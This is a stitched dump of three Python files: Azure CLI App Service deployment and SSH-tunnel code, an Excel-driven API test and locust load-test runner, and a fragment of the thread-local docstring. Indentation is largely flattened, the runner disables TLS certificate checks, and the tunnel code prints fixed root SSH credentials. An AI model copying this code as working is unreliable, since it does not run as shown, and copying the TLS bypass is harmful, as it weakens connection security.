raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we always call the ASP create or update API so that, in case of a re-deployment, any
    # updated SKU or plan settings get applied
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else:  # for an existing app, we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
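# Hedged usage sketch (added, not part of the original source) showing how the parameters of
# webapp_up map onto the CLI surface; the exact flag spellings are assumed from the signature above:
#   az webapp up --name <app-name> --resource-group <rg> --sku F1 --location westeurope --dryrun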
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
    # wake up Kudu by making an SCM call
    import requests
    # workaround until the timeout-limits issue for Linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on Linux and macOS')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
        raise CLIError('Remote debugging is enabled; please disable it first')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
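# Added comment: when only a name is given, the helper expands it to a full ARM resource id of the
# form /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Web/hostingEnvironments/<ase-name>.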
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
        result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
    else:
        result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
        result = client.web_apps.delete_function_secret_slot(resource_group_name,
                                                             name,
                                                             function_name,
                                                             key_name,
                                                             slot,
                                                             raw=True)
    else:
        result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
main.py
|
import os
import sys
import logging
import shutil
from threading import Thread
from threading import Lock
import unittest
from optparse import OptionParser
import ddt
import requests
from requests.packages import urllib3
import json
from json import JSONDecodeError
import apirun
from .genReport import html_report
from .getToken import get_token
from .extractExcel import HandleExcel
from .mail import *
from .PressureTest import *
from .PtSlave import ConnectSlave
urllib3.disable_warnings()
logger = logging.getLogger(__name__)
version = apirun.__version__
report_dir = ''
headers = {"Content-Type": "application/json"}
_success = 0
_failure = 0
_error = 0
_count_lock = Lock()
def add_success(num_s):
global _success
_count_lock.acquire()
_success += num_s
_count_lock.release()
def add_failure(num_f):
global _failure
_count_lock.acquire()
_failure += num_f
_count_lock.release()
def add_error(num_e):
global _error
_count_lock.acquire()
_error += num_e
_count_lock.release()
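# Added note: these module-level counters are shared by every test run; main() may launch
# start_test() in separate threads (one per testcase file), so the Lock above keeps the
# success/failure/error totals consistent across those threads.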
def parse_options():
"""
Handle command-line options with optparse.OptionParser.
Return list of arguments, largely for use in `parse_arguments`.
"""
# Initialize
parser = OptionParser(usage="apirun [options] [ApiRunClass [ApiRunClass2 ... ]]")
parser.add_option(
'-f', '--testcasefile',
dest='testcasefile',
help="Testcase to run, e.g. '../testcase.xls'."
)
parser.add_option(
'-F', '--testcasefolder',
dest='testcasefolder',
help="all testcase in the foler to run.",
default=""
)
parser.add_option(
'--report',
action='store',
type='str',
dest='report',
default='report',
help="Store the reports.",
)
# Version number (optparse gives you --version but we have to do it
# ourselves to get -V too. sigh)
parser.add_option(
'-V', '--version',
action='store_true',
dest='show_version',
default=False,
help="show program's version number and exit"
)
parser.add_option(
'--demo',
action='store_true',
dest='make_demo',
default=False,
help="make demo xls in working folder"
)
parser.add_option(
'--email',
action='store_true',
dest='email',
default=False,
        help='send an email after the API test finishes'
)
    parser.add_option(
        '--from',
        action='store',
        type='str',
        dest='email_from',
        default=None,
        help='the address that sends the email'
    )
    parser.add_option(
        '--to',
        action='store',
        type='str',
        dest='email_to',
        default=None,
        help='the address(es) that receive the email'
    )
    parser.add_option(
        '--subject',
        action='store',
        type='str',
        dest='email_subject',
        default=None,
        help='the email subject'
    )
    parser.add_option(
        '--host',
        action='store',
        type='str',
        dest='email_host',
        default=None,
        help='the email host'
    )
parser.add_option(
'--pt', '--pressuretest',
dest='PtFile',
        help='run a pressure test according to the xls file, backed by locustio'
)
parser.add_option(
'--pt-demo',
action='store_true',
dest='PtDemo',
default=False,
help='make PT demo file in current folder'
)
parser.add_option(
'--pt-not-run',
dest='PtNotRun',
        help='only generate the locustfile from the xls, without running it'
)
parser.add_option(
'--master',
action='store_true',
default=False,
dest='master',
help='Set locust to run in distributed mode with this process as master, use this parameter with --pt'
)
# Finalize
# Return three-tuple of parser + the output from parse_args (opt obj, args)
opts, args = parser.parse_args()
return parser, opts, args
def run_test(title, filename, report_path, description, testcase):
test = unittest.TestLoader().loadTestsFromTestCase(testcase)
suit = unittest.TestSuite([test])
runner, fp = html_report(title=title, filename=filename, report_path=report_path, description=description)
results = runner.run(suit)
fp.close()
e = results.error_count
f = results.failure_count
s = results.success_count
add_success(s)
add_failure(f)
add_error(e)
def get_apirun_path():
    apirun_path = ''
    if sys.platform.startswith('win'):  # startswith avoids matching 'darwin'
        python3_path = os.getenv('PYTHON')
if not python3_path:
python3_path = os.getenv('PYTHON3')
if python3_path:
if 'python3' in python3_path.lower():
if 'scripts' in python3_path.lower():
apirun_path = os.path.join(os.path.dirname(os.path.dirname(python3_path)), 'Lib\\site-packages\\apirun\\')
else:
apirun_path = os.path.join(python3_path, 'Lib\\site-packages\\apirun\\')
else:
sys_path = os.getenv('path').split(';')
for each in sys_path:
if 'python3' in each.lower() and 'scripts' not in each.lower():
python3_path = each
break
apirun_path = os.path.join(python3_path, 'Lib\\site-packages\\apirun\\')
elif 'linux' in sys.platform:
with os.popen('find /usr/local/ -name apirun -type d') as lp:
apirun_path = lp.read().strip()
return apirun_path
def str_to_json(data):
data = str(data).replace('\'', '"')
    j = json.loads(data)  # the 'encoding' keyword was deprecated and removed from json.loads in Python 3.9
return j
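# Hedged note (added): str_to_json only swaps single quotes for double quotes, e.g.
#   "{'name': 'demo'}"  ->  '{"name": "demo"}'
# which is enough for the simple dict-style cells used in the xls testcases, but would break on
# values that themselves contain quote characters.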
def start_test(testcasefile):
testcase_data = HandleExcel(testcasefile)
token_url, token_body, token_para, token_locate = testcase_data.auth_info()
token_body = str_to_json(token_body)
try:
token = get_token(token_url, token_body, token_locate)
except KeyError:
        logger.error('Please check your auth info; could not get a valid response.')
sys.exit(1)
except Exception as e:
logger.error('{}'.format(e))
sys.exit(1)
global headers
headers[token_para] = token
testcase_list = testcase_data.testcase_list()
report_title, report_description = testcase_data.report_info()
@ddt.ddt
class ApiRun(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.headers = headers
@classmethod
def tearDownClass(cls):
pass
@ddt.idata(testcase_list)
@ddt.unpack
def test_api(self, title, url, auth, method, query, request_data, expect_status, expect_str):
            print('用例标题:' + title + 'END')  # Do not delete this line: the HTML report matches this output with a regex to add the case title to the report
method = method.upper()
if query:
query = str_to_json(query)
if request_data:
request_body = str_to_json(request_data)
else:
request_body = None
exp_status_code = int(expect_status)
_headers = self.headers
if str(auth) == '0' or auth == 'FALSE':
_headers = {"Content-Type": "application/json"}
if method == 'GET': # GET
response_actual = requests.get(url=url, headers=_headers, params=query, verify=False)
elif method == 'POST': # POST
response_actual = requests.post(url=url, headers=_headers, json=request_body, params=query, verify=False)
elif method == 'DELETE': # DELETE
response_actual = requests.delete(url=url, headers=_headers, params=query, verify=False)
elif method == 'PUT': # PUT
response_actual = requests.put(url=url, headers=_headers, params=query, json=request_body, verify=False)
elif method == 'PATCH': # patch
response_actual = requests.patch(url=url, headers=_headers, params=query, json=request_body, verify=False)
elif method == 'HEAD':
response_actual = requests.head(url=url, headers=_headers, params=query, verify=False)
elif method == 'OPTIONS':
response_actual = requests.options(url=url, headers=_headers, params=query, verify=False)
else: # Other method, such as TRACE
response_actual = requests.request(method=method, url=url, headers=_headers, params=query, json=request_body, verify=False)
actual_status_code = int(response_actual.status_code)
if actual_status_code == exp_status_code:
print('Status code is same: {sc}'.format(sc=actual_status_code))
if expect_str:
expect_str = expect_str.strip()
act_response = response_actual.json()
print('Actual response: {}'.format(act_response))
                    if expect_str.endswith(';'):
                        expect_str = expect_str.strip(';')
                    if expect_str.endswith('；'):
                        expect_str = expect_str.strip('；')
                    if (';' not in expect_str) and ('；' not in expect_str):
                        self.assertIn(expect_str, str(act_response), msg='{} is not in response'.format(expect_str))
                    else:
                        if ';' in expect_str:
                            expect_str_list = expect_str.split(';')
                        else:
                            expect_str_list = expect_str.split('；')
for each_str in expect_str_list:
each_str = each_str.strip()
self.assertIn(each_str, str(act_response), msg='{} is not in response'.format(each_str))
else:
try:
act_response = response_actual.json()
print('Actual response: {}'.format(act_response))
except JSONDecodeError:
act_response = response_actual.text
print('Not json response: {}'.format(act_response))
self.fail('Status code is different! Actual code is {}'.format(actual_status_code))
report_filename = testcasefile.replace('\\', '-')
run_test(title=report_title, filename=report_filename, report_path=report_dir, description=report_description,
testcase=ApiRun)
def pt_slave(ip, username, password, ptfile, ptcommand):
connect = ConnectSlave(ip, username, password)
is_locust = connect.check_locust()
if is_locust:
dest = '/root/' + ptfile
connect.trans_file(source=ptfile, dest=dest)
connect.remote_command(command=ptcommand)
else:
logging.error('Slave {} cannot run locust.'.format(ip))
def main():
parser, options, arguments = parse_options()
# setup logging
# logger = logging.getLogger(__name__)
apirun_path = get_apirun_path()
pwd = os.getcwd()
    _run = False
    _run_pt = False
    _email_mark = False
if options.show_version:
print("Apirun %s" % (version,))
sys.exit(0)
if options.make_demo:
if not apirun_path:
            logger.error('Cannot locate the Python path; make sure it is in the right place. On Windows add it to '
                         'the system PATH; on Linux make sure Python is installed under /usr/local/lib/.')
sys.exit(1)
demo_path = os.path.join(apirun_path, 'demo', 'demo_testcase.xls')
new_demo = os.path.join(pwd, 'demo.xls')
shutil.copyfile(demo_path, new_demo)
sys.exit(0)
if options.PtDemo:
if not apirun_path:
            logger.error('Cannot locate the Python path; make sure it is in the right place. On Windows add it to '
                         'the system PATH; on Linux make sure Python is installed under /usr/local/lib/.')
sys.exit(1)
pt_demo_path = os.path.join(apirun_path, 'demo', 'demo_pressuretest.xls')
pt_new_demo = os.path.join(pwd, 'PtDemo.xls')
shutil.copyfile(pt_demo_path, pt_new_demo)
sys.exit(0)
if options.email:
global yag, email_to, subject
_email = []
if not (options.email_from and options.email_to):
if not os.path.isfile('email.json'):
                logger.error('This is your first time using the email function; please fill in email.json and run again.')
demo_email = os.path.join(apirun_path, 'demo', 'email.json')
new_email = os.path.join(pwd, 'email.json')
shutil.copyfile(demo_email, new_email)
sys.exit(0)
else:
with open('email.json', 'r') as ef:
email_info = json.load(ef)
email_from = email_info['from']
subject = email_info['subject']
if subject == '': subject = 'API Test Result'
receivers = email_info['receiver']
email_to = []
for _e in receivers.keys():
email_to.extend(receivers[_e])
email_host = email_info['host']
if options.email_host:
email_host = options.email_host
if options.email_from:
email_from = options.email_from
if options.email_to:
_to = options.email_to
if _to in receivers.keys():
email_to = receivers[_to]
else:
email_to = email_in_cil(_to)
if options.email_subject:
subject = options.email_subject
else:
email_from = options.email_from
email_to = options.email_to
email_host = options.email_host
if options.email_subject: subject = options.email_subject
else: subject = 'API Test Result'
_email.append(email_from)
_email.extend(email_to)
        for _each in _email:
            if not check_address(_each):
                logger.error('Email address is not correct: {}'.format(_each))
                sys.exit(1)
yag = init_email(username=email_from, host=email_host)
_email_mark = True
if options.email_from:
if not options.email:
logger.error('Cannot use --from without --email.')
sys.exit(1)
if options.email_to:
if not options.email:
logger.error('Cannot use --to without --email.')
sys.exit(1)
if options.email_host:
if not options.email:
logger.error('Cannot use --host without --email.')
sys.exit(1)
if options.email_subject:
if not options.email:
logger.error('Cannot use --subject without --email.')
sys.exit(1)
if options.master:
if not options.PtFile:
logger.error('Cannot use --master without --pt.')
sys.exit(1)
if options.report:
global report_dir
report_dir = options.report
if not apirun_path:
            logger.error('Cannot locate the Python path; make sure it is in the right place. On Windows add it to '
                         'the system PATH; on Linux make sure Python is installed under /usr/local/lib/.')
sys.exit(1)
try:
os.makedirs(os.path.join(report_dir, 'js'))
js_file = os.path.join(apirun_path, 'js', 'echarts.common.min.js')
shutil.copyfile(js_file, os.path.join(report_dir, 'js', 'echarts.common.min.js'))
except FileExistsError:
pass
if options.testcasefile:
if options.testcasefolder:
logger.error('Cannot use -f and -F together.')
sys.exit(1)
testcasefile = options.testcasefile
if not testcasefile.endswith('.xls'):
logger.error("Testcasefile must be end with '.xls' and see --help for available options.")
sys.exit(1)
if not os.path.isfile(testcasefile):
            logger.error('Testcase file does not exist, please check it.')
sys.exit(1)
start_test(testcasefile=testcasefile)
_run = True
if options.testcasefolder:
if options.testcasefile:
logger.error('Cannot use -f and -F together.')
sys.exit(1)
testcase_folder = options.testcasefolder
if testcase_folder:
if not os.path.isdir(testcase_folder):
                logger.error('Testcase folder does not exist, please check it.')
sys.exit(1)
_dir, _subdir, files = list(os.walk(testcase_folder))[0]
else:
_dir, _subdir, files = list(os.walk(os.getcwd()))[0]
testcase_file_list = []
for each in files:
if each.endswith('.xls'):
testcase_file_list.append(os.path.join(testcase_folder, each))
if len(testcase_file_list) == 0:
            logger.error('There is no testcase file in the testcase folder.')
sys.exit(1)
for testcasefile in testcase_file_list:
t = Thread(target=start_test, args=(testcasefile,))
print(t)
print('+++++++++++++++ ' + testcasefile)
t.start()
t.join()
_run = True
if options.PtNotRun:
if options.PtFile:
logger.error('Cannot use --pt and --pt-not-run together.')
sys.exit(1)
pt_file = options.PtNotRun
if not pt_file.endswith('.xls'):
logger.error("PressureTest file must be end with '.xls' and see --help for available options.")
sys.exit(1)
if not os.path.isfile(pt_file):
            logger.error('PressureTest file does not exist, please check it.')
sys.exit(1)
make_locustfile(pt_file)
        logger.info('Locustfile generated successfully.')
sys.exit(0)
if options.PtFile:
if options.PtNotRun:
logger.error('Cannot use --pt and --pt-not-run together.')
sys.exit(1)
pt_file = options.PtFile
if not pt_file.endswith('.xls'):
logger.error("PressureTest file must be end with '.xls' and see --help for available options.")
sys.exit(1)
if not os.path.isfile(pt_file):
            logger.error('PressureTest file does not exist, please check it.')
sys.exit(1)
make_locustfile(pt_file)
ptpy = pt_file.replace('.xls', '.py')
        pt_report = os.path.splitext(pt_file)[0]  # str.strip('.xls') would strip characters, not the suffix
if not options.master:
locust_cli = 'locust -f {locustfile} --csv={ptReport}'.format(locustfile=ptpy, ptReport=pt_report)
try:
os.system(locust_cli)
except KeyboardInterrupt:
shutil.move(pt_report+'_distribution.csv', os.path.join(report_dir, pt_report+'_distribution.csv'))
shutil.move(pt_report+'_requests.csv', os.path.join(report_dir, pt_report+'_requests.csv'))
_run_pt = True
else:
pt_s = PtExcel(pt_file)
master_ip, pt_slave_info = pt_s.pt_slave()
if master_ip == '':
logger.error('Master IP cannot be empty when --master is used.')
sys.exit(1)
locust_cli_master = 'locust -f {locustfile} --csv={ptReport} --master'.format(locustfile=ptpy, ptReport=pt_report)  # identical on Windows and Linux
try:
locust_cli_slave = 'nohup locust -f /root/{locustfile} --slave --master-host={master_ip} > /dev/null 2>&1 &'.format(locustfile=ptpy, master_ip=master_ip)
for slave in pt_slave_info:
slave_ip, slave_username, slave_password = slave
_t = Thread(target=pt_slave, args=(slave_ip, slave_username, slave_password, ptpy, locust_cli_slave))
logger.info('Prepare slave {}'.format(slave_ip))
_t.start()
_t.join()
os.system(locust_cli_master)
except KeyboardInterrupt:
pass
except Exception as e:
logger.error('Something went wrong; exception: {}'.format(e))
finally:
shutil.move(pt_report + '_distribution.csv', os.path.join(report_dir, pt_report + '_distribution.csv'))
shutil.move(pt_report + '_requests.csv', os.path.join(report_dir, pt_report + '_requests.csv'))
_run_pt = True
if _run or _run_pt:
if _run:
print('==================')
results_message = '''
Results:
Total: {t}
Success: {s}
Failure: {f}
Error: {e}
'''.format(t=(_success + _failure + _error), s=_success, f=_failure, e=_error)
print(results_message)
else:
results_message = 'Pressure Test Result.'
if _email_mark:
attachment = subject.replace(' ', '_') + '.zip'
zip_report(report_dir, attachment)
send_email(yag, subject=subject, to=email_to, msg=results_message, attachment=attachment)
else:
sys.exit(0)
sys.exit(0)
if __name__ == '__main__':
main()
|
_threading_local.py
|
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
